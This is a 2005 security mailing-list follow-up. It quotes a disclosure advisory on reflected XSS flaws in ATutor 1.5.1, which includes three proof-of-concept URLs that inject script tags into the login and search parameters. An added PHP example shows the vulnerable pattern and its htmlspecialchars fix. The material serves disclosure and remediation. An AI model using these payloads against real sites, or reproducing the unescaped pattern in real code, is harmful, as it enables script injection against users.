Just to let all of you know: after I shared this bug (ATutor 1.5.1 and prior multiple XSS vulnerabilities) with you all, I received an email today from the developer of this product in reply to the notification I sent him indicating the weaknesses. He has assured me that the bugs have been fixed and that the fixes will be included in the next release of ATutor, which is scheduled for sometime later.
On 8/18/05, h4cky0u <[EMAIL PROTECTED]> wrote:
> ATutor 1.5.1 and prior multiple XSS Vulnerabilities
>
> SEVERITY:
> =========
> Medium
>
> SOFTWARE:
> =========
> ATutor 1.5.1
> http://www.atutor.ca/
>
> INFO:
> =====
> ATutor 1.5.1 is a web based education portal.
>
> DESCRIPTION:
> ============
> The system is vulnerable to various XSS attacks:
>
> --==XSS==--
>
> Some examples -
>
> http://localhost/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script>
>
> http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages
>
> http://localhost/tour/search.php?search=1&words="><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search
>
> VENDOR STATUS:
> ==============
> Vendor was contacted but no response received till date.
>
> CREDITS:
> ========
> This vulnerability was discovered and researched by
> matrix_killer of h4cky0u Security Forums.
>
> mail : matrix_k at abv.bg
>
> web : http://www.h4cky0u.org
>
> Co-Researcher:
> h4cky0u of h4cky0u Security Forums.
>
> mail : h4cky0u at gmail.com
>
> web : http://www.h4cky0u.org
>
> Greets to all omega-team members + krassswr, EcLiPsE and all who support us !!!
>
> ORIGINAL:
> =========
> http://h4cky0u.org/viewtopic.php?t=2094
>
> --
> http://www.h4cky0u.org
> (In)Security at its best...

--
http://www.h4cky0u.org
(In)Security at its best...
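As an added defender-side illustration (not code from ATutor and not part of the advisory or this thread), the PHP snippet below shows the reflection pattern behind the advisory's login.php?course= and search.php?words= examples, and the standard fix: encoding the parameter for the HTML attribute context with htmlspecialchars() and ENT_QUOTES before it is written into the page. The function names, the form markup, the `output_is_inert` check and the test payload are all assumptions constructed for this example; the search.php case follows the same pattern with a different parameter name.

```php
<?php
// Added example: reflected query-string parameter written into an attribute.
// The attribute context is why the advisory's payloads start with "> : an
// unescaped double quote closes value="..." and the rest of the input becomes
// markup the browser will execute.

// Vulnerable pattern (assumed, for illustration): the raw value is concatenated
// straight into the attribute.
function render_course_field_vulnerable(string $course): string
{
    return '<input type="hidden" name="course" value="' . $course . '">';
}

// Hardened pattern: encode for the HTML attribute context. ENT_QUOTES converts
// both " and ' so the value cannot break out of a single- or double-quoted
// attribute; ENT_SUBSTITUTE keeps invalid UTF-8 from turning the result into
// an empty string (which would otherwise silently drop the value).
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_course_field_safe(string $course): string
{
    return '<input type="hidden" name="course" value="' . html_attr($course) . '">';
}

// Regression check a maintainer can keep in a test suite (assumed helper):
// after encoding, the attribute body must contain no raw <, >, " or ' characters,
// i.e. nothing that can terminate the attribute or open a tag.
function output_is_inert(string $html, string $expected_prefix): bool
{
    $body = substr($html, strlen($expected_prefix)); // strip the static prefix
    $body = substr($body, 0, -2);                     // strip the closing ">
    return strpbrk($body, '<>"\'') === false;
}

// Constructed test payload, shaped like the ones quoted in the advisory.
$payload = '"><script>alert(1);</script>';
$prefix  = '<input type="hidden" name="course" value="';

echo "vulnerable: " . render_course_field_vulnerable($payload) . "\n";
echo "hardened:   " . render_course_field_safe($payload) . "\n";

// The vulnerable rendering fails the check; the hardened one passes it.
var_dump(output_is_inert(render_course_field_vulnerable($payload), $prefix));
var_dump(output_is_inert(render_course_field_safe($payload), $prefix));
```

The same encoding has to be applied at every point where the parameter is echoed, not only where the advisory's examples land; a single unencoded echo of the same value elsewhere on the page reopens the issue. Run with `php example.php` to see the two renderings side by side.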